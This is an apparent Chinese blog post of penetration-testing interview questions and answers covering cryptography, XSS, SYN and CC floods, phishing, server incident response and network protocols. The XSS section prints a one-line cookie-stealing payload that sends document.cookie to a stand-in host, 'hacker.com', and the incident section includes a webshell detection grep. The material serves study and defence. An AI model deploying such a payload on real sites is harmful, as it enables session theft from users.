2025年渗透测试面试题总结-07(题目+回答)
安全领域各种资源,学习文档,以及工具分享、前沿信息分享、POC、EXP分享。不定期分享各种好玩的项目及好用的工具,欢迎关注。
目录
一、对称加密 vs 非对称加密
二、同源策略(Same-Origin Policy)
三、Cookie存储与访问
四、XSS盗取Cookie流程
五、XSS与登录凭证
六、XSS防御体系
七、SYN洪水攻击原理
八、网络钓鱼(Phishing)
九、CC攻击(Challenge Collapasar)
十、Web服务器入侵排查步骤
十一、DLL文件(动态链接库)
十二、HTTPS核心作用
十三、Web攻击防御速查
十四、协议分布层
十五、ARP协议工作原理
十六、RIP协议(路由信息协议)
十七、RARP(反向地址解析协议)
十八、OSPF协议(开放最短路径优先)
十九、TCP vs UDP核心区别
实用建议
一、对称加密和非对称加密二、什么是同源策略?三、cookie 存在哪里?可以打开吗?四、xss 如何盗取 cookie?五、xss 有 cookie 一定可以无用户名密码登录吗?六、xss 如何防御?七、SYN 攻击原理八、什么是网络钓鱼?九、什么是 CC 攻击?十、Web 服务器被入侵后,怎样进行排查?十一、dll 文件是什么意思,有什么用?十二、Https 的作用十三、防范常见的 Web 攻击十四、重要协议分布层十五、arp 协议的工作原理十六、rip 协议是什么?rip 的工作原理十七、什么是 RARP?工作原理十八、OSPF 协议?OSPF 的工作原理十九、TCP 与 UDP 区别总结
一、对称加密 vs 非对称加密
类型 对称加密 非对称加密 密钥机制 单密钥(加密解密相同) 公钥加密 + 私钥解密 速度 快(适合大数据量) 慢(CPU消耗高) 安全性 依赖密钥保管 私钥不泄露即安全 典型算法 AES, DES RSA, ECC 应用场景 HTTPS数据传输加密 SSL握手、数字签名
二、同源策略(Same-Origin Policy)
- 定义:浏览器限制不同源(协议+域名+端口相同)的脚本访问对方资源
- 目的:防止恶意网站窃取用户数据(如Cookie)
- 绕过机制:
- CORS(跨域资源共享):服务端设置
Access-Control-Allow-Origin
- JSONP:通过
<script>
标签加载跨域数据(仅限GET)
三、Cookie存储与访问
属性 说明 存储位置 浏览器本地(文件或数据库) 打开方式 浏览器开发者工具 → Application → Cookies(可查看/编辑) 安全限制 HttpOnly
标记的Cookie禁止JS读取(防XSS盗取)生命周期 会话Cookie(关闭浏览器删除) / 持久Cookie(按 Expires
时间保留)
四、XSS盗取Cookie流程
mermaid
sequenceDiagram attacker->>victim: 发送含恶意脚本的链接 victim->>server: 访问被攻击页面 server->>victim: 返回嵌入恶意脚本的HTML victim->>browser: 执行脚本(发送Cookie到攻击者服务器) attacker->>attacker_server: 接收Cookie数据
关键代码:
document.cookie
+new Image().src='http://hacker.com?cookie='+encodeURIComponent(document.cookie)
五、XSS与登录凭证
- 有条件登录:
- ✅ 若Cookie含会话ID(如
sessionid=xxx
)且未设HttpOnly
→ 直接冒用身份- ❌ 若Cookie仅为用户偏好数据 → 无法登录
- 限制:
- 会话ID需在有效期内
- 目标网站未启用二次验证(如短信/OTP)
六、XSS防御体系
层级 防御措施 输入过滤 特殊字符转义( <
→<
)、白名单验证输出编码 根据上下文选择HTML/JS/URL编码(如 <script>
→\u003cscript\u003e
)CSP策略 HTTP头设置 Content-Security-Policy: script-src 'self'
(禁止内联脚本)Cookie安全 标记 HttpOnly
+Secure
(仅HTTPS传输)
七、SYN洪水攻击原理
- 利用缺陷:TCP三次握手未完成时,服务端维护半连接队列(消耗资源)
- 攻击步骤:
- 伪造大量虚假IP发送
SYN
包- 服务端回复
SYN-ACK
并等待应答(队列占满)- 正常用户无法建立连接
- 防御方案:
- SYN Cookie技术(无状态验证)
- 防火墙限制每秒SYN包数量
八、网络钓鱼(Phishing)
- 手法:伪装可信机构(银行/支付平台),诱导用户提交敏感信息
- 常见形式:
- 钓鱼邮件(含虚假登录链接)
- 仿冒网站(域名如
paypa1.com
)- 伪基站短信
- 防御:
- 用户教育(识别域名、HTTPS锁标志)
- 浏览器标记钓鱼网站(Safe Browsing API)
九、CC攻击(Challenge Collapasar)
- 本质:针对应用层的DDoS攻击
- 原理:模拟大量正常请求(如频繁刷新页面、API调用),耗尽服务器资源
- 与DDoS区别:
CC攻击 DDoS攻击 应用层(HTTP) 网络层(TCP/UDP洪水) 消耗CPU/数据库 消耗带宽/连接数 - 防御:
- 人机验证(验证码)
- 请求频率限制(IP/用户)
十、Web服务器入侵排查步骤
- 隔离服务器:断网防止横向渗透
- 备份日志:
- Web访问日志(Apache/Nginx)
- 系统日志(
/var/log/auth.log
)- 查异常进程:
netstat -tunlp
(异常端口)top
(高CPU进程)- 查后门文件:
- 查找近期修改文件:
find / -mtime -2
- 扫描Web目录:
grep -r "eval(base64_decode" /var/www
- 漏洞修复:更新系统/应用补丁
十一、DLL文件(动态链接库)
- 作用:
- 共享代码库(多个程序调用同一功能)
- 模块化开发(如Windows系统
kernel32.dll
)- 劫持风险:恶意DLL替换系统文件 → 程序加载时执行恶意代码
- 防护:
- 签名验证(
signtool verify
)- 设置DLL搜索路径白名单
十二、HTTPS核心作用
安全目标 实现机制 数据保密性 对称加密(如AES-256) 身份认证 CA机构签发数字证书(验证服务器身份) 数据完整性 MAC(消息认证码)或HMAC防篡改
十三、Web攻击防御速查
攻击类型 防御方案 SQL注入 参数化查询(PreparedStatement)、存储过程 CSRF Anti-CSRF Token、 SameSite=Strict
Cookie属性文件上传 限制扩展名(白名单)、重命名文件、存储到非Web目录 SSRF 内网IP黑名单、请求目标域名白名单
十四、协议分布层
协议 所属OSI层级 典型应用 ARP 数据链路层 IP → MAC地址映射 RIP/OSPF 网络层 动态路由协议 TCP/UDP 传输层 端到端数据传输 HTTPS 应用层 安全HTTP通信
十五、ARP协议工作原理
- 查询:主机A广播
ARP Request
(目标IP → 问MAC)- 响应:目标主机B单播
ARP Reply
(返回MAC)- 缓存:主机A记录IP-MAC映射到ARP表(有效期分钟级)
- 攻击风险:ARP欺骗(伪造MAC对应关系) → 中间人攻击
- 防御:静态ARP绑定、网络设备ARP检测
十六、RIP协议(路由信息协议)
- 类型:距离向量路由协议(基于跳数)
- 工作原理:
- 路由器每30秒广播路由表给邻居
- 跳数+1(最大15跳,16跳视为不可达)
- 路由收敛慢(需多次广播更新)
- 适用场景:小型局域网(现多被OSPF替代)
十七、RARP(反向地址解析协议)
- 作用:已知MAC地址 → 获取IP地址(无盘工作站场景)
- 流程:
- 客户端广播
RARP Request
(含自身MAC)- RARP服务器响应
RARP Reply
(分配IP)- 替代协议:BOOTP、DHCP(功能更强大)
十八、OSPF协议(开放最短路径优先)
- 类型:链路状态路由协议(基于Dijkstra算法)
- 核心机制:
- 洪泛法广播链路状态(LSA)
- 构建拓扑图 → 计算最短路径树
- 划分区域(Area 0为骨干)减少广播域
- 优势:快速收敛、支持大规模网络
十九、TCP vs UDP核心区别
维度 TCP UDP 连接方式 面向连接(三次握手) 无连接 可靠性 有序、重传、流量控制 尽力交付(可能丢包) 传输速度 慢(头部20字节+握手延迟) 快(头部8字节) 数据边界 字节流(需处理粘包) 数据报(保留边界) 应用场景 文件传输、Web页面 视频流、DNS查询、实时游戏
实用建议
- 协议分析:用Wireshark抓包观察TCP握手、ARP请求等流程
- 安全加固:
- Web服务器:定期更新补丁 + 最小化开放端口
- 开发规范:禁用
eval()
、所有输入视为不可信- 面试重点:深入理解HTTPS握手流程、XSS/CSRF防御方案、TCP可靠性机制
附:命令速查
- 查看ARP缓存:
arp -a
- 检测开放端口:
netstat -ano | findstr LISTENING
- 验证证书链:
openssl s_client -connect example.com:443 -showcerts